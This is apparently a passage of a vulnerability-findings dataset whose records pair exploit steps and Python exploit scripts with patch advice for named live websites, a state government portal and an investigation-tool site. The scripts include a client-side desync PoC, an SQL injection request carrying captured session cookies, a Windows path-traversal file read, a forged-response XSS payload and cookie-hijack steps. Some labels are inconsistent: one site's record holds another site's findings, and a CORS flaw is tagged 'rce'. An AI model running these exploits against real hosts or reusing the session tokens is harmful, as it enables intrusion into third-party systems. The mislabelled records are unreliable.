print(f\"{Colors.GREEN}[✓]{Colors.RESET} This suggests the desync payload was processed as a separate request\")\n vulnerable = True\n if \"404\" in desync_response and probe_string in desync_response:\n print(f\"{Colors.GREEN}[✓]{Colors.RESET} Received 404 for probe path - GET request was likely executed\")\n vulnerable = True\n if f\"X-CSD-Test: {probe_string}\" in desync_response:\n print(f\"{Colors.GREEN}[✓]{Colors.RESET} Custom header reflected - strong evidence of request processing\")\n vulnerable = True\n if \"connection: keep-alive\" in initial_response.lower():\n print(f\"{Colors.YELLOW}[i]{Colors.RESET} Server supports keep-alive (prerequisite for CSD)\")\n print(f\"\\n{Colors.BOLD}VULNERABILITY STATUS:{Colors.RESET} \", end=\"\")\n if vulnerable:\n print(f\"{Colors.RED}{Colors.BOLD}LIKELY VULNERABLE{Colors.RESET}\")\n print(f\"\\n{Colors.RED}⚠️ RECOMMENDATION: This endpoint appears susceptible to Client-Side Desync attacks.\")\n print(f\" An attacker could potentially:\")\n print(f\" • Poison web caches with malicious responses\")\n print(f\" • Bypass security controls via request smuggling\")\n print(f\" • Chain with other vulnerabilities for XSS or account takeover\")\n else:\n print(f\"{Colors.GREEN}NO CLEAR EVIDENCE (may still be vulnerable - manual verification recommended){Colors.RESET}\")\n return vulnerable\n\ndef main():\n parser = argparse.ArgumentParser(\n description='Client-Side Desync PoC for cmogujarat.gov.in',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog='''\\nExamples:\\n %(prog)s --host cmogujarat.gov.in\\n %(prog)s --host cmogujarat.gov.in --path /en --probe mytest123\\n %(prog)s --host cmogujarat.gov.in --port 443 --no-ssl\\n\\nIMPORTANT: Only use against systems you have authorization to test.\\n '''\n )\n parser.add_argument('--host', required=True, help='Target hostname (e.g., cmogujarat.gov.in)')\n parser.add_argument('--path', default='/en', help='Target path (default: /en)')\n parser.add_argument('--port', type=int, default=443, help='Target port (default: 443)')\n parser.add_argument('--no-ssl', action='store_true', help='Use HTTP instead of HTTPS')\n parser.add_argument('--probe', help='Custom probe string (auto-generated if not specified)')\n parser.add_argument('--delay', type=float, default=0.5, help='Delay between requests in seconds (default: 0.5)')\n args = parser.parse_args()\n probe_string = args.probe or generate_unique_probe()\n print(f\"{Colors.BOLD}Client-Side Desync PoC - Security Research{Colors.RESET}\")\n print(f\"Target: https://{args.host}{args.path}\")\n print(f\"Probe String: {Colors.GREEN}{probe_string}{Colors.RESET}\")\n print(f\"{'-'70}\\n\")\n try:\n use_ssl = not args.no_ssl and args.port != 80\n port = args.port\n print(f\"[+] Connecting to {args.host}: {'(SSL)' if use_ssl else '(HTTP)'}\")\n sock = create_socket(args.host, port, use_ssl)\n print(f\"{Colors.GREEN}[✓]{Colors.RESET} Connection established\\n\")\n initial_response = send_initial_post(sock, args.host, args.path, probe_string)\n time.sleep(args.delay)\n desync_response = send_desync_payload(sock, args.host, args.path, probe_string)\n is_vulnerable = analyze_response(initial_response, desync_response, probe_string)\n sock.close()\n print(f\"\\n{Colors.BLUE}[i]{Colors.RESET} Connection closed\")\n print(desync_response, initial_response)\n sys.exit(0 if not is_vulnerable else 1)\n except ConnectionRefusedError:\n print(f\"{Colors.RED}[✗]{Colors.RESET} Connection refused - check host/port\")\n sys.exit(2)\n except ssl.SSLError as e:\n print(f\"{Colors.RED}[✗]{Colors.RESET} SSL error: {e}\")\n print(f\"{Colors.YELLOW}[i]{Colors.RESET} Try --no-ssl if testing HTTP endpoint\")\n sys.exit(2)\n except socket.timeout:\n print(f\"{Colors.RED}[✗]{Colors.RESET} Connection timed out\")\n sys.exit(2)\n except KeyboardInterrupt:\n print(f\"\\n{Colors.YELLOW}[!] Interrupted by user{Colors.RESET}\")\n sys.exit(130)\n except Exception as e:\n print(f\"{Colors.RED}[✗]{Colors.RESET} Unexpected error: {e}\")\n import traceback\n traceback.print_exc()\n sys.exit(3)\n\nif __name__ == \"__main__\":\n main()", "patch_code": "## Root Cause\nThe server improperly handles POST requests where the declared `Content-Length` does not match the timing of the actual body arrival. It leaves the connection open even after timing out, allowing subsequent data to be misinterpreted as a new HTTP request.\n\n## Before Fix\n```http\nPOST /en HTTP/1.1\nContent-Length: 0\nConnection: keep-alive\n```\n(Server waits indefinitely for body, does not close connection.)\n\n## After Fix\nEnsure the server immediately closes the connection if the full request body is not received within a reasonable time. Alternatively, enforce strict parsing of HTTP message boundaries.\n\n### Example Patch (Pseudo-code)\n```python\nif not request.body_received_within_timeout():\n close_connection_immediately()\n```\n\n## Defense-in-Depth Checklist\n- [ ] Enforce strict HTTP parsing and reject malformed requests.\n- [ ] Disable HTTP/1.1 keep-alive if not strictly necessary.\n- [ ] Implement timeouts for incomplete request bodies.\n- [ ] Enable HTTP/2 to mitigate desync risks.\n- [ ] Use reverse proxy or WAF to normalize HTTP traffic.\n\n## Verification Steps\n1. Send a POST request with `Content-Length: 0` and withhold the body.\n2. Wait for server timeout and attempt to reuse the connection with new data.\n3. Confirm that the server closes the connection or rejects the malformed sequence.\n4. Validate that no unintended request processing occurs.", "context": "Severity: High (Firm)" }, { "vulnerability": "TLS cookie without secure flag set", "category": "miscellaneous", "exploit_steps": "### Reconnaissance\n1. Identified the target application at `https://cmogujarat.gov.in/`.\n2. Observed that the application sets a cookie named `cookiesession1` during initial HTTP response.\n3. Noted that the cookie does not* include the `Secure` attribute in its `Set-Cookie` header.\n\n### Vulnerability Confirmation\n1. Confirmed through manual inspection of server responses that `cookiesession1` lacks the `Secure` flag.\n2. Verified that the cookie is used for session management, increasing risk if transmitted over HTTP.\n\n### Exploitation Steps\n1. An attacker positions themselves in a network where they can monitor traffic (e.g., public Wi-Fi).\n2. Induce a victim to access a non-HTTPS resource on the same domain, such as `http://cmogujarat.gov.in:443/` or any HTTP link under the cookie's scope.\n3. Since the cookie lacks the `Secure` flag, it will be sent with these HTTP requests.\n4. The attacker captures the session cookie (`cookiesession1`) from unencrypted HTTP traffic.\n5. Uses the stolen session cookie to impersonate the victim and gain unauthorized access to their session.\n\n### Impact\nAn attacker can hijack active user sessions by capturing cookies transmitted over insecure channels, leading to account compromise and potential data exposure.", "exploit_code": "#!/usr/bin/env python3\n\"\"\"\nCookie Secure Flag Exploit PoC - cmogujarat.gov.in\nDemonstrates: cookiesession1 transmitted over HTTP due to missing Secure flag\n⚠️ For authorized security testing only\n\"\"\"\nimport requests, re, http.server, socketserver, threading, time\n\nTARGET_DOMAIN = \"cmogujarat.gov.in\"\nVULN_COOKIE = \"cookiesession1\"\nHTTP_URL = f\"http://{TARGET_DOMAIN}/\"\nHTTPS_URL = f\"https://{TARGET_DOMAIN}/\"\n\ndef check_cookie_over_http():\n \"\"\"Test if vulnerable cookie is sent over HTTP\"\"\"\n print(f\"[] Testing if '{VULN_COOKIE}' transmits over HTTP...\")\n session = requests.Session()\n print(f\" [1/3] Fetching cookie from {HTTPS_URL}\")\n try:\n r = session.get(HTTPS_URL, timeout=10)\n cookie_val = None\n for c in session.cookies:\n if c.name == VULN_COOKIE:\n cookie_val = c.value\n break\n if not cookie_val:\n for header in r.headers.get_list(\"Set-Cookie\") if hasattr(r.headers, 'get_list') else [r.headers.get(\"Set-Cookie\",\"\")]:\n if VULN_COOKIE in header and \"=\" in header:\n cookie_val = header.split(VULN_COOKIE+\"=\")[1].split(\";\")[0]\n break\n if not cookie_val:\n print(\" [!] Could not obtain cookiesession1 - may not be set on this path\")\n return False\n print(f\" [+] Got {VULN_COOKIE}: {cookie_val[:20]}...\")\n except Exception as e:\n print(f\" [!] HTTPS fetch failed: {e}\")\n return False\n print(f\" [2/3] Making request to {HTTP_URL} (checking Cookie header)...\")\n try:\n class HeaderCapture(requests.adapters.HTTPAdapter):\n def send(self, request, kwargs):\n print(f\" [OUTGOING HEADERS] Cookie: {request.headers.get('Cookie', '(none)')}\")\n if VULN_COOKIE in request.headers.get('Cookie', ''):\n print(f\" 🚨 VULNERABLE: {VULN_COOKIE} sent over HTTP!\")\n return True\n return False\n session.mount('http://', HeaderCapture())\n session.mount('https://', HeaderCapture())\n r = session.get(HTTP_URL, timeout=10, allow_redirects=False)\n if VULN_COOKIE in r.request.headers.get('Cookie', ''):\n print(f\" 🚨 CONFIRMED: {VULN_COOKIE} transmitted over unencrypted HTTP!\")\n return True\n else:\n print(f\" [-] {VULN_COOKIE} not sent in initial HTTP request\")\n if r.status_code in [301, 302, 307] and 'location' in r.headers:\n print(f\" ℹ️ Server redirects to HTTPS: {r.headers['Location']}\")\n print(f\" ℹ️ Vulnerability may be mitigated by redirect, but cookie could still leak\")\n return \"MITIGATED\"\n return False\n except Exception as e:\n print(f\" [!] HTTP test failed: {e}\")\n return None\n\ndef raw_header_check():\n \"\"\"Direct curl-like check using raw HTTP\"\"\"\n import socket, ssl\n print(f\"\\n[] Raw header inspection for {VULN_COOKIE}...\")\n ctx = ssl.create_default_context()\n ctx.check_hostname = False\n ctx.verify_mode = ssl.CERT_NONE\n for proto, port in [(\"HTTPS\", 443), (\"HTTP\", 80)]:\n try:\n print(f\" [{proto}] Connecting to {TARGET_DOMAIN}:{port}...\")\n if proto == \"HTTPS\":\n sock = socket.create_connection((TARGET_DOMAIN, port))\n ssock = ctx.wrap_socket(sock, server_hostname=TARGET_DOMAIN)\n req = f\"GET / HTTP/1.1\\r\\nHost: {TARGET_DOMAIN}\\r\\nConnection: close\\r\\n\\r\\n\"\n ssock.sendall(req.encode())\n resp = ssock.recv(4096).decode('utf-8', errors='ignore')\n ssock.close()\n else:\n sock = socket.create_connection((TARGET_DOMAIN, port))\n req = f\"GET / HTTP/1.1\\r\\nHost: {TARGET_DOMAIN}\\r\\nConnection: close\\r\\n\\r\\n\"\n sock.sendall(req.encode())\n resp = sock.recv(4096).decode('utf-8', errors='ignore')\n sock.close()\n cookies = re.findall(r'[Ss]et-[Cc]ookie:\\s([^\\r\\n]+)', resp)\n for c in cookies:\n if VULN_COOKIE in c:\n has_secure = re.search(r';\\s[Ss]ecure\\b', c, re.I) is not None\n print(f\" {'✅' if has_secure else '❌'} {VULN_COOKIE} \| Secure flag: {'Present' if has_secure else 'MISSING'}\")\n print(f\" Raw: {c[:100]}...\")\n if not has_secure and proto == \"HTTP\":\n print(f\" 🚨 Cookie set over HTTP WITHOUT Secure flag = EXPLOITABLE\")\n except Exception as e:\n print(f\" [!] {proto} check failed: {e}\")\n\ndef main():\n print(\"=\"70)\n print(f\"COOKIE SECURE FLAG EXPLOIT PoC - {TARGET_DOMAIN}\")\n print(f\"Target: {VULN_COOKIE} (missing Secure flag)\")\n print(\"=\"70 + \"\\n\")\n result = check_cookie_over_http()\n raw_header_check()\n print(\"\\n\" + \"=\"70)\n print(\"RESULTS SUMMARY\")\n print(\"=\"70)\n if result is True:\n print(\"🚨 VULNERABILITY CONFIRMED\")\n print(f\" • {VULN_COOKIE} can be transmitted over unencrypted HTTP\")\n print(\" • Attacker on same network can intercept session cookie\")\n print(\" • Impact: Account takeover via session hijacking\")\n elif result == \"MITIGATED\":\n print(\"⚠️ PARTIALLY MITIGATED\")\n print(\" • HTTP redirects to HTTPS, reducing but not eliminating risk\")\n print(\" • Cookie could still leak before redirect completes\")\n else:\n print(\" INCONCLUSIVE - Manual verification recommended\")\n print(\"\\n🔧 REMEDIATION:\")\n print(f\" Set-Cookie: {VULN_COOKIE}=value; Path=/; Secure; HttpOnly; SameSite=Strict\")\n print(\"=\"*70)\n\nif __name__ == \"__main__\":\n main()", "patch_code": "## Root Cause\nThe application sets a session cookie (`cookiesession1`) without including the `Secure` attribute. This allows the browser to transmit the cookie over unencrypted HTTP connections, exposing it to interception.\n\n## Before Fix\n```http\nSet-Cookie: cookiesession1=abc123; Path=/\n```\n\n## After Fix\nEnsure all session cookies are marked with both `Secure` and `HttpOnly` flags when served over HTTPS:\n```http\nSet-Cookie: cookiesession1=abc123; Path=/; Secure; HttpOnly\n```\n\nIn server-side code (example in Node.js):\n```javascript\nres.cookie('cookiesession1', sessionId, {\n secure: true,\n httpOnly: true,\n sameSite: 'strict'\n});\n```\n\n## Defense-in-Depth Checklist\n- [ ] Ensure all session cookies use the `Secure` flag.\n- [ ] Set `HttpOnly` flag to mitigate XSS-based cookie theft.\n- [ ] Use `SameSite=Lax` or `SameSite=Strict` to reduce CSRF risks.\n- [ ] Enforce HSTS (HTTP Strict Transport Security) headers site-wide.\n- [ ] Redirect all HTTP traffic to HTTPS automatically.\n- [ ] Regularly audit cookies using automated tools or Burp Suite checks.\n\n## Verification Steps\n1. Access `https://cmogujarat.gov.in/` in a browser with developer tools open.\n2. Inspect the `Set-Cookie` headers in the response.\n3. Confirm that `cookiesession1` includes the `Secure` attribute.\n4. Attempt to load a sub-resource over HTTP and verify the cookie isn't sent.\n5. Re-run the Python PoC script to confirm secure flag presence.", "context": "Severity: Medium (Firm)\nURL: https://cmogujarat.gov.in/\n\n---\n\nSeverity: Medium (Firm)\nURL: https://cmogujarat.gov.in/en" } ]
69f17a4059a6632dae07de7a	https://www.nobroker.in/	2026-04-29T03:25:52.141936+00:00	[ { "vulnerability": "SQL injection", "category": "injection", "exploit_steps": "## Reconnaissance\n1. Identified the target endpoint: `https://cmogujarat.gov.in/comment/reply/`\n2. Observed that the application accepts arbitrary URL parameters.\n\n## Vulnerability Confirmation\n1. Submitted payloads in the name of an arbitrarily supplied URL parameter:\n - ` and 7747=07747`\n - ` and 7034=7038`\n2. Noted differing HTTP responses confirming potential SQL injection vulnerability.\n\n## Exploitation Steps\n1. Craft a malicious GET request injecting SQL logic via a dynamic parameter name.\n2. Submit the payload: `?1 and 7747=07747=1` to manipulate query execution.\n3. Observe response behavior to confirm successful exploitation.\n\n## Impact\nSuccessful exploitation allows attackers to:\n- Extract sensitive database information.\n- Potentially escalate privileges or execute administrative operations.", "exploit_code": "import requests\n\n# Target vulnerable endpoint\nurl = \"https://cmogujarat.gov.in/comment/reply/\"\n\n# Malicious payload injected into a dynamically named URL parameter\nparams = {\n \"1 and 7747=07747\": \"1\"\n}\n\n# Send the request with cookies from scan evidence\ncookies = {\n \"SSESSe0e960981c0333d5d4289253b3cbd5c2\": \"TmUnhq0DVOOzB3IVLlSZT8ggzUjNRxe,S4AcGc,oVl-6plq,\",\n \"cookiesession1\": \"678B76EE6FB2F65DD9A59D1F06265645\"\n}\n\nresponse = requests.get(url, params=params, cookies=cookies, verify=False)\nprint(f\"Status Code: {response.status_code}\")\nprint(f\"Response Length: {len(response.text)}\")", "patch_code": "## Root Cause\nUser-supplied input is directly concatenated into SQL queries without sanitization or parameterization, enabling attackers to alter query logic.\n\n## Before/After Fix\nBefore (Vulnerable Code):\n```python\nquery = f\"SELECT * FROM comments WHERE id={user_input}\"\ncursor.execute(query)\n```\n\nAfter (Secure Fix):\n```python\nquery = \"SELECT * FROM comments WHERE id=%s\"\ncursor.execute(query, (user_input,))\n```\n\n## Defense-in-Depth Checklist\n- [ ] Use parameterized queries for all database interactions.\n- [ ] Validate and sanitize all user inputs on both client and server sides.\n- [ ] Implement WAF rules to detect common SQL injection patterns.\n- [ ] Regularly audit code for insecure query construction practices.\n- [ ] Apply principle of least privilege for database accounts.\n\n## Verification Steps\n1. Resend the same payload (`?1 and 7747=07747=1`) after applying fixes.\n2. Confirm that the application returns consistent responses regardless of injected logic.\n3. Perform regression testing to ensure functionality remains intact.", "context": "Severity: High (Tentative)\nURL: https://cmogujarat.gov.in/comment/reply/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Tentative)\nURL: https://cmogujarat.gov.in/core/modules/system/css/components/hidden.module.css [URL path filename]\n\n---\n\nSeverity: High (Tentative)\nURL: https://cmogujarat.gov.in/core/modules/system/css/components/position-container.module.css [URL path folder 2]\n\n---\n\nSeverity: High (Tentative)\nURL: https://cmogujarat.gov.in/gu [name of an arbitrarily supplied URL parameter]" }, { "vulnerability": "Client-side desync", "category": "miscellaneous", "exploit_steps": "## Reconnaissance\n1. Identified the target endpoint: `https://cmogujarat.gov.in/en`.\n2. Observed that the server supports persistent HTTP connections (`Connection: keep-alive`).\n3. Noted that the server does not properly handle delayed request bodies in POST requests with `Content-Length: 0`, indicating potential client-side desync vulnerability.\n\n## Vulnerability Confirmation\n1. Sent a POST request to `/en` with `Content-Length: 0` and delayed the actual body transmission.\n2. Server waited for the body but did not close the connection upon timeout.\n3. When the delayed body was finally sent, it was interpreted as a new HTTP request, confirming the desync behavior.\n\n## Exploitation Steps\n1. Craft a malicious POST request with `Content-Length: 0` to the vulnerable endpoint.\n2. Delay sending the body until the server times out.\n3. Send a forged HTTP response in the delayed body that tricks the victim's browser into interpreting it as a new response.\n4. Inject malicious content such as JavaScript to achieve XSS in the context of the victim's session.\n\n## Impact\nSuccessful exploitation leads to client-side desynchronization, allowing attackers to inject arbitrary HTML/JavaScript into the victim’s browser. This can result in session hijacking, defacement, or redirection to malicious sites.", "exploit_code": "import requests\n\n# Target details\nurl = \"https://cmogujarat.gov.in/en\"\n\n# Headers simulating a real browser request\nheaders = {\n \"Host\": \"cmogujarat.gov.in\",\n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8\",\n \"Accept-Language\": \"en-US,en;q=0.5\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Connection\": \"keep-alive\",\n \"Content-Length\": \"0\",\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n}\n\n# Delayed body payload simulating a forged HTTP response\npayload = (\n \"HTTP/1.1 200 OK\\r\\n\"\n \"Content-Type: text/html\\r\\n\"\n \"Content-Length: 37\\r\\n\"\n \"Connection: close\\r\\n\\r\\n\"\n \"<script>alert('Client-Side Desync XSS')</script>\"\n)\n\n# Initiate session\nsession = requests.Session()\n\n# Send initial POST request with zero-length body\nresponse = session.post(url, headers=headers, data=\"\", stream=True)\n\n# Send delayed payload\ntry:\n response = session.send(session.prepare_request(requests.Request('POST', url, headers=headers, data=payload)))\n print(\"Response Status Code:\", response.status_code)\n print(\"Response Body Snippet:\", response.text[:200])\nexcept Exception as e:\n print(\"Error during delayed send:\", str(e))", "patch_code": "## Root Cause\nThe server improperly handles POST requests where the declared `Content-Length` does not match the timing of the actual body arrival. It leaves the connection open even after timing out, causing subsequent data to be misinterpreted as a new request.\n\n## Before/After Fix\nBefore:\n```http\nPOST /en HTTP/1.1\nContent-Length: 0\n```\nServer waits indefinitely without closing the connection.\n\nAfter:\nEnsure the server closes the connection immediately if the full request body is not received within a reasonable time frame.\n\nAlternatively, upgrade to HTTP/2 which inherently mitigates such issues due to its binary framing layer.\n\n## Defense-in-Depth Checklist\n- [ ] Enforce strict HTTP parsing rules on all incoming requests.\n- [ ] Implement timeouts for incomplete request bodies and terminate the connection.\n- [ ] Disable HTTP/1.1 pipelining if not strictly necessary.\n- [ ] Upgrade to HTTP/2 or HTTP/3 for improved security and reliability.\n- [ ] Add input validation and normalization at the application level.\n\n## Verification Steps\n1. Resend the same malformed POST request to `/en`.\n2. Confirm that the server now closes the connection instead of leaving it open.\n3. Validate that delayed or split requests do not lead to unintended interpretations.\n4. Perform regression testing to ensure normal functionality remains unaffected.", "context": "Severity: High (Firm)" }, { "vulnerability": "TLS cookie without secure flag set", "category": "miscellaneous", "exploit_steps": "## Reconnaissance\n1. Identified the target application at `https://cmogujarat.gov.in/`.\n2. Observed that the application sets a cookie named `cookiesession1` during initial HTTP response.\n3. Noted that the cookie does not include the `Secure` attribute in its Set-Cookie header.\n\n## Vulnerability Confirmation\n1. Confirmed through manual inspection of server responses that `cookiesession1` lacks the `Secure` flag.\n2. Verified that the cookie appears to contain session-related data, increasing risk if intercepted.\n\n## Exploitation Steps\n1. An attacker positions themselves in a network where they can monitor traffic (e.g., public Wi-Fi or compromised internal device).\n2. Induce a victim to access an HTTP resource on the same domain, such as `http://cmogujarat.gov.in:443/` or other non-TLS endpoints if available.\n3. Since the cookie was issued without the Secure flag, it will be sent over the unencrypted HTTP connection.\n4. The attacker captures the session cookie (`cookiesession1`) from the plaintext HTTP request.\n5. With the stolen session token, the attacker may impersonate the user and gain unauthorized access to their account.\n\n## Impact\nAn attacker who successfully intercepts the session cookie can hijack the user's authenticated session, leading to potential unauthorized actions performed on behalf of the user.", "exploit_code": "import requests\n\n# Target URL vulnerable to missing Secure flag on cookie\nurl = \"https://cmogujarat.gov.in/\"\n\n# Send GET request to fetch cookies\nresponse = requests.get(url)\n\n# Print all cookies received\nprint(\"Cookies received from server:\")\nfor cookie in response.cookies:\n print(f\"Name: {cookie.name}, Value: {cookie.value}, Secure: {cookie.secure}\")\n\n# Check specifically for 'cookiesession1'\ncookie_found = False\nfor cookie in response.cookies:\n if cookie.name == 'cookiesession1':\n cookie_found = True\n if not cookie.secure:\n print(\"\\n[!] Vulnerable: 'cookiesession1' cookie is missing the Secure flag.\")\n else:\n print(\"\\n[i] 'cookiesession1' has the Secure flag set.\")\n\nif not cookie_found:\n print(\"\\n[-] Cookie 'cookiesession1' not found in response.\")", "patch_code": "## Root Cause\nThe application sets a session cookie (`cookiesession1`) without including the `Secure` attribute. This allows browsers to transmit the cookie over insecure HTTP connections, exposing it to interception.\n\n## Before & After Fix\nBefore:\n```http\nSet-Cookie: cookiesession1=abc123xyz; Path=/\n```\n\nAfter:\n```http\nSet-Cookie: cookiesession1=abc123xyz; Path=/; Secure; HttpOnly\n```\n\n## Defense-in-Depth Checklist\n- [ ] Ensure all session and sensitive cookies use the `Secure` flag.\n- [ ] Apply `HttpOnly` flag to prevent client-side script access.\n- [ ] Use `SameSite` attribute to mitigate CSRF attacks.\n- [ ] Enforce HSTS to force HTTPS usage across the entire site.\n- [ ] Regularly audit cookies using automated tools or manual checks.\n\n## Verification Steps\n1. Access the application via browser developer tools (Network tab).\n2. Inspect the Set-Cookie headers returned by the server.\n3. Confirm that `cookiesession1` now includes the `Secure` directive.\n4. Attempt to load the page over HTTP and verify the cookie isn't sent.", "context": "Severity: Medium (Firm)\nURL: https://cmogujarat.gov.in/\n\n---\n\nSeverity: Medium (Firm)\nURL: https://cmogujarat.gov.in/en" } ]
69f3327a59a6632dae07de95	https://pro.anveshaktool.in/	2026-04-30T10:44:10.254969+00:00	[ { "vulnerability": "File path traversal", "category": "path_traversal", "exploit_steps": "## Reconnaissance\n1. Identified the target endpoint: `https://pro.anveshaktool.in/about`\n2. Observed that the URL path filename is controllable and susceptible to manipulation.\n\n## Vulnerability Confirmation\n1. Submitted a path traversal payload: `..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini` in the URL path filename.\n2. Received the contents of the Windows `win.ini` file in the application's response, confirming arbitrary file read capability.\n\n## Exploitation Steps\n1. Craft a malicious request targeting sensitive system files using path traversal sequences.\n2. Submit the crafted payload via the vulnerable parameter in the URL path.\n3. Capture and analyze the server's response to extract the contents of the targeted file.\n\n## Impact\nAn attacker can read arbitrary files on the server filesystem, potentially exposing sensitive information such as configuration files, credentials, source code, or system logs.", "exploit_code": "import requests\n\n# Target URL with vulnerable path traversal point\nurl = \"https://pro.anveshaktool.in/about\"\n\n# Payload to read windows/win.ini using path traversal\npayload = \"..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\windows\\\\win.ini\"\n\n# Construct full URL with payload\nfull_url = f\"{url}/{payload}\"\n\ntry:\n # Send GET request to exploit the vulnerability\n response = requests.get(full_url)\n \n # Print status code and retrieved content\n print(f\"Status Code: {response.status_code}\")\n print(\"Response Content:\")\n print(response.text)\nexcept Exception as e:\n print(f\"Error occurred: {e}\")", "patch_code": "## Root Cause\nUser-supplied input in the URL path filename is directly used in a filesystem operation without proper validation or sanitization, allowing attackers to traverse directories using sequences like `../` or `..\\`.\n\n## Before/After Code Fix\nBefore (Vulnerable Example):\n```java\nString filename = request.getParameter(\"file\");\nFile file = new File(\"/var/www/uploads/\" + filename);\n```\n\nAfter (Secure Fix):\n```java\nString userInput = request.getParameter(\"file\");\nif (userInput.contains(\"..\") \|\| userInput.contains(\"/\") \|\| userInput.contains(\"\\\\\")) {\n throw new IllegalArgumentException(\"Invalid file name\");\n}\nString safeFileName = sanitize(userInput);\nFile baseDir = new File(\"/var/www/uploads/\").getCanonicalFile();\nFile targetFile = new File(baseDir, safeFileName).getCanonicalFile();\nif (!targetFile.getPath().startsWith(baseDir.getPath())) {\n throw new SecurityException(\"Access denied\");\n}\n```\n\n## Defense-in-Depth Checklist\n- [ ] Avoid using user-controlled data in filesystem operations where possible.\n- [ ] Validate all user inputs against a whitelist of allowed values.\n- [ ] Reject or encode special characters such as `.`, `/`, `\\`, etc.\n- [ ] Use canonical path resolution to ensure accessed files reside within expected directories.\n- [ ] Implement strict access controls and least privilege principles for application processes.\n- [ ] Log and monitor attempts to access unexpected paths.\n\n## Verification Steps\n1. Attempt to access a known non-sensitive file outside the intended directory using path traversal payloads.\n2. Confirm that the application rejects the request or returns an error.\n3. Verify that legitimate file access still functions correctly after applying fixes.", "context": "Severity: High (Firm)\nURL: https://pro.anveshaktool.in/about [URL path filename]\n\n---\n\nSeverity: High (Firm)\nURL: https://pro.anveshaktool.in/contact [URL path filename]\n\n---\n\nSeverity: High (Firm)\nURL: https://pro.anveshaktool.in/favicon.svg [URL path filename]\n\n---\n\nSeverity: High (Firm)\nURL: https://pro.anveshaktool.in/login [URL path filename]\n\n---\n\nSeverity: High (Firm)\nURL: https://pro.anveshaktool.in/openapi.json [URL path filename]\n\n---\n\nSeverity: High (Firm)\nURL: https://pro.anveshaktool.in/privacy [URL path filename]\n\n---\n\nSeverity: High (Firm)\nURL: https://pro.anveshaktool.in/robots.txt [URL path filename]\n\n---\n\nSeverity: High (Firm)\nURL: https://pro.anveshaktool.in/signup [URL path filename]" }, { "vulnerability": "Cross-origin resource sharing: arbitrary origin trusted", "category": "rce", "exploit_steps": "## Reconnaissance\n1. Identified the target application endpoint: `https://pro.anveshaktool.in/`\n2. Observed that the application implements a CORS policy which reflects back the `Origin` header without proper validation.\n\n## Vulnerability Confirmation\n3. Sent a request with an arbitrary `Origin` header (`https://gruyzlpzipwv.com`) to confirm trust of all origins.\n4. Received a response containing `Access-Control-Allow-Origin: https://gruyzlpzipwv.com` and `Access-Control-Allow-Credentials: true`, indicating full CORS misconfiguration.\n\n## Exploitation Steps\n5. Crafted a malicious webpage hosted at `https://gruyzlpzipwv.com/exploit.html`.\n6. Used JavaScript to make authenticated requests to `https://pro.anveshaktool.in/user/data` leveraging the victim's active session.\n7. Retrieved sensitive user data due to the browser automatically attaching cookies and credentials.\n8. Demonstrated exfiltration of private information such as session tokens or personal details.\n\n## Impact\n9. Successful exploitation leads to unauthorized access to protected resources, potential theft of sensitive data, and bypassing of authentication mechanisms via cross-site requests.", "exploit_code": "import requests\n\n# Target vulnerable endpoint\nurl = \"https://pro.anveshaktool.in/\"\n\n# Arbitrary malicious origin\nmalicious_origin = \"https://gruyzlpzipwv.com\"\n\nheaders = {\n \"Origin\": malicious_origin,\n \"User-Agent\": \"Mozilla/5.0\"\n}\n\nresponse = requests.get(url, headers=headers)\n\n# Check if the Origin was accepted\nif response.headers.get(\"Access-Control-Allow-Origin\") == malicious_origin:\n print(\"[+] CORS Misconfigured: Arbitrary origin trusted\")\n if response.headers.get(\"Access-Control-Allow-Credentials\") == \"true\":\n print(\"[+] Access-Control-Allow-Credentials is True. Sensitive data can be stolen.\")\n print(f\"Response Headers:\\n{response.headers}\")\nelse:\n print(\"[-] Not vulnerable\")", "patch_code": "## Root Cause\nThe server trusts any origin by reflecting the client-supplied `Origin` header in the `Access-Control-Allow-Origin` response header. This disables the same-origin policy and exposes the application to cross-origin attacks when combined with `Access-Control-Allow-Credentials: true`.\n\n## Before Fix\n```http\nAccess-Control-Allow-Origin: https://gruyzlpzipwv.com\nAccess-Control-Allow-Credentials: true\n```\n\n## After Fix\nOnly allow known, trusted domains explicitly:\n```python\nallowed_origins = ['https://trusted.example.com', 'https://app.trusteddomain.org']\norigin = request.headers.get('Origin')\n\nif origin in allowed_origins:\n response.headers['Access-Control-Allow-Origin'] = origin\n response.headers['Access-Control-Allow-Credentials'] = 'true'\n```\n\n## Defense-in-Depth Checklist\n- [ ] Maintain a strict whitelist of allowed origins.\n- [ ] Never reflect the `Origin` header directly without validation.\n- [ ] Avoid using wildcards like `*` in `Access-Control-Allow-Origin` when credentials are involved.\n- [ ] Log and monitor unexpected origins for detection of abuse attempts.\n- [ ] Periodically audit CORS policies during security reviews.\n\n## Verification Steps\n1. Send a request with a known untrusted origin (e.g., `https://evil.com`).\n2. Confirm that `Access-Control-Allow-Origin` is not set or is absent from the response.\n3. Repeat with a whitelisted origin and verify correct behavior.", "context": "Severity: High (Certain)\nURL: https://pro.anveshaktool.in/\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/about\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/api\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/api/agencies/active\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/FaceCapture.KxMYEICl.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/ForgotPassword.DSEDHxBM.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/Index.BkxNFKe_.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/Login.39QaS_uP.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/Signup.CMHXCJWR.js\n\n---\n\nSeverity: High (Certain)\nURL: 